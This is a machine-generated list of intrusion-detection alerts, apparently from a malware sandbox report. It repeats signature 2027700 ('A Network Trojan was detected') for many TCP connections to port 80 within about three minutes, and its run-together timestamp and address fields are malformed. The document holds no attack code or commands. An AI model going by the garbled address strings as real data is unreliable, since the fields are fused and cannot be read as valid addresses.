                              Timestamp:192.168.2.762.204.41.450246802027700 02/06/23-18:38:18.266167
                              SID:2027700
                              Source Port:50246
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450184802027700 02/06/23-18:38:01.659964
                              SID:2027700
                              Source Port:50184
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450143802027700 02/06/23-18:37:51.857942
                              SID:2027700
                              Source Port:50143
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449781802027700 02/06/23-18:36:11.243044
                              SID:2027700
                              Source Port:49781
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450095802027700 02/06/23-18:37:38.824933
                              SID:2027700
                              Source Port:50095
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449963802027700 02/06/23-18:37:03.026261
                              SID:2027700
                              Source Port:49963
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449893802027700 02/06/23-18:36:41.133872
                              SID:2027700
                              Source Port:49893
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449922802027700 02/06/23-18:36:51.089881
                              SID:2027700
                              Source Port:49922
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450115802027700 02/06/23-18:37:43.614292
                              SID:2027700
                              Source Port:50115
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450185802027700 02/06/23-18:38:01.897079
                              SID:2027700
                              Source Port:50185
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449851802027700 02/06/23-18:36:29.678141
                              SID:2027700
                              Source Port:49851
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449804802027700 02/06/23-18:36:18.533346
                              SID:2027700
                              Source Port:49804
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449762802027700 02/06/23-18:36:06.819557
                              SID:2027700
                              Source Port:49762
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450227802027700 02/06/23-18:38:13.624631
                              SID:2027700
                              Source Port:50227
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450061802027700 02/06/23-18:37:29.246156
                              SID:2027700
                              Source Port:50061
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450316802027700 02/06/23-18:38:36.846930
                              SID:2027700
                              Source Port:50316
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450020802027700 02/06/23-18:37:19.544837
                              SID:2027700
                              Source Port:50020
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450274802027700 02/06/23-18:38:25.337791
                              SID:2027700
                              Source Port:50274
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450070802027700 02/06/23-18:37:32.801483
                              SID:2027700
                              Source Port:50070
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449794802027700 02/06/23-18:36:14.301275
                              SID:2027700
                              Source Port:49794
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449938802027700 02/06/23-18:36:57.008660
                              SID:2027700
                              Source Port:49938
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450073802027700 02/06/23-18:37:33.536848
                              SID:2027700
                              Source Port:50073
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450058802027700 02/06/23-18:37:28.499164
                              SID:2027700
                              Source Port:50058
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450156802027700 02/06/23-18:37:54.967951
                              SID:2027700
                              Source Port:50156
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450067802027700 02/06/23-18:37:31.325633
                              SID:2027700
                              Source Port:50067
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449880802027700 02/06/23-18:36:37.960430
                              SID:2027700
                              Source Port:49880
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449950802027700 02/06/23-18:36:59.857429
                              SID:2027700
                              Source Port:49950
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449766802027700 02/06/23-18:36:07.787301
                              SID:2027700
                              Source Port:49766
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450128802027700 02/06/23-18:37:46.748438
                              SID:2027700
                              Source Port:50128
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449864802027700 02/06/23-18:36:32.756228
                              SID:2027700
                              Source Port:49864
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449775802027700 02/06/23-18:36:09.999214
                              SID:2027700
                              Source Port:49775
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450214802027700 02/06/23-18:38:10.502845
                              SID:2027700
                              Source Port:50214
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449849802027700 02/06/23-18:36:29.177906
                              SID:2027700
                              Source Port:49849
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449947802027700 02/06/23-18:36:59.148434
                              SID:2027700
                              Source Port:49947
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450042802027700 02/06/23-18:37:24.857893
                              SID:2027700
                              Source Port:50042
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450140802027700 02/06/23-18:37:51.157275
                              SID:2027700
                              Source Port:50140
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450296802027700 02/06/23-18:38:31.975155
                              SID:2027700
                              Source Port:50296
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450131802027700 02/06/23-18:37:47.485008
                              SID:2027700
                              Source Port:50131
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450312802027700 02/06/23-18:38:35.876032
                              SID:2027700
                              Source Port:50312
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450303802027700 02/06/23-18:38:33.662984
                              SID:2027700
                              Source Port:50303
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450086802027700 02/06/23-18:37:36.704777
                              SID:2027700
                              Source Port:50086
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449919802027700 02/06/23-18:36:50.383743
                              SID:2027700
                              Source Port:49919
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450299802027700 02/06/23-18:38:32.713859
                              SID:2027700
                              Source Port:50299
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450045802027700 02/06/23-18:37:25.620164
                              SID:2027700
                              Source Port:50045
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450169802027700 02/06/23-18:37:58.055436
                              SID:2027700
                              Source Port:50169
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449991802027700 02/06/23-18:37:09.959911
                              SID:2027700
                              Source Port:49991
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450039802027700 02/06/23-18:37:24.123203
                              SID:2027700
                              Source Port:50039
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450017802027700 02/06/23-18:37:18.799281
                              SID:2027700
                              Source Port:50017
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450366802027700 02/06/23-18:38:50.739823
                              SID:2027700
                              Source Port:50366
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449747802027700 02/06/23-18:36:03.176630
                              SID:2027700
                              Source Port:49747
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449877802027700 02/06/23-18:36:37.241186
                              SID:2027700
                              Source Port:49877
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450112802027700 02/06/23-18:37:42.889738
                              SID:2027700
                              Source Port:50112
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449966802027700 02/06/23-18:37:03.777402
                              SID:2027700
                              Source Port:49966
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449753802027700 02/06/23-18:36:04.648625
                              SID:2027700
                              Source Port:49753
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449836802027700 02/06/23-18:36:26.304985
                              SID:2027700
                              Source Port:49836
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450283802027700 02/06/23-18:38:28.863963
                              SID:2027700
                              Source Port:50283
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450325802027700 02/06/23-18:38:38.783317
                              SID:2027700
                              Source Port:50325
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450201802027700 02/06/23-18:38:05.815511
                              SID:2027700
                              Source Port:50201
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450242802027700 02/06/23-18:38:17.282353
                              SID:2027700
                              Source Port:50242
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450331802027700 02/06/23-18:38:40.257821
                              SID:2027700
                              Source Port:50331
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449900802027700 02/06/23-18:36:42.821925
                              SID:2027700
                              Source Port:49900
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450323802027700 02/06/23-18:38:38.290728
                              SID:2027700
                              Source Port:50323
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449961802027700 02/06/23-18:37:02.522336
                              SID:2027700
                              Source Port:49961
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450032802027700 02/06/23-18:37:22.465405
                              SID:2027700
                              Source Port:50032
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449878802027700 02/06/23-18:36:37.478498
                              SID:2027700
                              Source Port:49878
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450127802027700 02/06/23-18:37:46.506415
                              SID:2027700
                              Source Port:50127
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449750802027700 02/06/23-18:36:03.933992
                              SID:2027700
                              Source Port:49750
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450050802027700 02/06/23-18:37:26.808863
                              SID:2027700
                              Source Port:50050
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449737802027700 02/06/23-18:36:00.769094
                              SID:2027700
                              Source Port:49737
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449896802027700 02/06/23-18:36:41.854218
                              SID:2027700
                              Source Port:49896
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450004802027700 02/06/23-18:37:15.494599
                              SID:2027700
                              Source Port:50004
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450341802027700 02/06/23-18:38:42.838470
                              SID:2027700
                              Source Port:50341
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450356802027700 02/06/23-18:38:48.308768
                              SID:2027700
                              Source Port:50356
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449994802027700 02/06/23-18:37:10.684632
                              SID:2027700
                              Source Port:49994
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449915802027700 02/06/23-18:36:49.430014
                              SID:2027700
                              Source Port:49915
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450145802027700 02/06/23-18:37:52.348178
                              SID:2027700
                              Source Port:50145
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449793802027700 02/06/23-18:36:14.067336
                              SID:2027700
                              Source Port:49793
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449933802027700 02/06/23-18:36:55.825769
                              SID:2027700
                              Source Port:49933
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450163802027700 02/06/23-18:37:56.641063
                              SID:2027700
                              Source Port:50163
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449755802027700 02/06/23-18:36:05.145544
                              SID:2027700
                              Source Port:49755
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450155802027700 02/06/23-18:37:54.734217
                              SID:2027700
                              Source Port:50155
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449951802027700 02/06/23-18:37:00.088634
                              SID:2027700
                              Source Port:49951
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450060802027700 02/06/23-18:37:28.997105
                              SID:2027700
                              Source Port:50060
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449827802027700 02/06/23-18:36:24.116181
                              SID:2027700
                              Source Port:49827
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449910802027700 02/06/23-18:36:48.230042
                              SID:2027700
                              Source Port:49910
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450351802027700 02/06/23-18:38:47.071030
                              SID:2027700
                              Source Port:50351
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449732802027700 02/06/23-18:35:59.129342
                              SID:2027700
                              Source Port:49732
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449809802027700 02/06/23-18:36:19.755075
                              SID:2027700
                              Source Port:49809
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450196802027700 02/06/23-18:38:04.592802
                              SID:2027700
                              Source Port:50196
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450328802027700 02/06/23-18:38:39.535775
                              SID:2027700
                              Source Port:50328
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450109802027700 02/06/23-18:37:42.135759
                              SID:2027700
                              Source Port:50109
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450178802027700 02/06/23-18:38:00.218801
                              SID:2027700
                              Source Port:50178
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449773802027700 02/06/23-18:36:09.507798
                              SID:2027700
                              Source Port:49773
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450137802027700 02/06/23-18:37:50.172258
                              SID:2027700
                              Source Port:50137
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450333802027700 02/06/23-18:38:40.754989
                              SID:2027700
                              Source Port:50333
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449810802027700 02/06/23-18:36:19.991660
                              SID:2027700
                              Source Port:49810
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450305802027700 02/06/23-18:38:34.163427
                              SID:2027700
                              Source Port:50305
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450173802027700 02/06/23-18:37:59.034324
                              SID:2027700
                              Source Port:50173
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449905802027700 02/06/23-18:36:44.026160
                              SID:2027700
                              Source Port:49905
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450210802027700 02/06/23-18:38:09.556488
                              SID:2027700
                              Source Port:50210
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450268802027700 02/06/23-18:38:23.521301
                              SID:2027700
                              Source Port:50268
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449727802027700 02/06/23-18:35:56.731345
                              SID:2027700
                              Source Port:49727
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449868802027700 02/06/23-18:36:33.899866
                              SID:2027700
                              Source Port:49868
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450251802027700 02/06/23-18:38:19.454938
                              SID:2027700
                              Source Port:50251
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450191802027700 02/06/23-18:38:03.374137
                              SID:2027700
                              Source Port:50191
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449837802027700 02/06/23-18:36:26.550389
                              SID:2027700
                              Source Port:49837
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450168802027700 02/06/23-18:37:57.812117
                              SID:2027700
                              Source Port:50168
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450165802027700 02/06/23-18:37:57.109837
                              SID:2027700
                              Source Port:50165
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450300802027700 02/06/23-18:38:32.957646
                              SID:2027700
                              Source Port:50300
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449898802027700 02/06/23-18:36:42.338054
                              SID:2027700
                              Source Port:49898
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449981802027700 02/06/23-18:37:07.544608
                              SID:2027700
                              Source Port:49981
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449941802027700 02/06/23-18:36:57.711371
                              SID:2027700
                              Source Port:49941
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450318802027700 02/06/23-18:38:37.320679
                              SID:2027700
                              Source Port:50318
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450346802027700 02/06/23-18:38:45.811035
                              SID:2027700
                              Source Port:50346
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449956802027700 02/06/23-18:37:01.309389
                              SID:2027700
                              Source Port:49956
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450030802027700 02/06/23-18:37:21.969699
                              SID:2027700
                              Source Port:50030
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449763802027700 02/06/23-18:36:07.067396
                              SID:2027700
                              Source Port:49763
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450315802027700 02/06/23-18:38:36.612364
                              SID:2027700
                              Source Port:50315
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449778802027700 02/06/23-18:36:10.754396
                              SID:2027700
                              Source Port:49778
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449800802027700 02/06/23-18:36:16.519327
                              SID:2027700
                              Source Port:49800
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449971802027700 02/06/23-18:37:04.988037
                              SID:2027700
                              Source Port:49971
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450122802027700 02/06/23-18:37:45.289416
                              SID:2027700
                              Source Port:50122
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450278802027700 02/06/23-18:38:27.635526
                              SID:2027700
                              Source Port:50278
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450107802027700 02/06/23-18:37:41.653833
                              SID:2027700
                              Source Port:50107
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450022802027700 02/06/23-18:37:20.029901
                              SID:2027700
                              Source Port:50022
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449752802027700 02/06/23-18:36:04.410535
                              SID:2027700
                              Source Port:49752
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450313802027700 02/06/23-18:38:36.114307
                              SID:2027700
                              Source Port:50313
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450241802027700 02/06/23-18:38:17.040111
                              SID:2027700
                              Source Port:50241
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449865802027700 02/06/23-18:36:32.990534
                              SID:2027700
                              Source Port:49865
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450193802027700 02/06/23-18:38:03.846258
                              SID:2027700
                              Source Port:50193
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450200802027700 02/06/23-18:38:05.567462
                              SID:2027700
                              Source Port:50200
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449735802027700 02/06/23-18:36:00.278415
                              SID:2027700
                              Source Port:49735
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449913802027700 02/06/23-18:36:48.947846
                              SID:2027700
                              Source Port:49913
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450063802027700 02/06/23-18:37:29.786603
                              SID:2027700
                              Source Port:50063
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449760802027700 02/06/23-18:36:06.332167
                              SID:2027700
                              Source Port:49760
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450213802027700 02/06/23-18:38:10.266408
                              SID:2027700
                              Source Port:50213
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450343802027700 02/06/23-18:38:43.443139
                              SID:2027700
                              Source Port:50343
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450354802027700 02/06/23-18:38:47.820987
                              SID:2027700
                              Source Port:50354
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449765802027700 02/06/23-18:36:07.550649
                              SID:2027700
                              Source Port:49765
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449902802027700 02/06/23-18:36:43.303336
                              SID:2027700
                              Source Port:49902
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449943802027700 02/06/23-18:36:58.182256
                              SID:2027700
                              Source Port:49943
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449984802027700 02/06/23-18:37:08.277099
                              SID:2027700
                              Source Port:49984
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450135802027700 02/06/23-18:37:49.197725
                              SID:2027700
                              Source Port:50135
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450176802027700 02/06/23-18:37:59.752747
                              SID:2027700
                              Source Port:50176
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449964802027700 02/06/23-18:37:03.280174
                              SID:2027700
                              Source Port:49964
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450298802027700 02/06/23-18:38:32.460707
                              SID:2027700
                              Source Port:50298
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450326802027700 02/06/23-18:38:39.035983
                              SID:2027700
                              Source Port:50326
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449768802027700 02/06/23-18:36:08.295559
                              SID:2027700
                              Source Port:49768
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449875802027700 02/06/23-18:36:36.759662
                              SID:2027700
                              Source Port:49875
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450142802027700 02/06/23-18:37:51.625961
                              SID:2027700
                              Source Port:50142
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450320802027700 02/06/23-18:38:37.801532
                              SID:2027700
                              Source Port:50320
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449786802027700 02/06/23-18:36:12.426489
                              SID:2027700
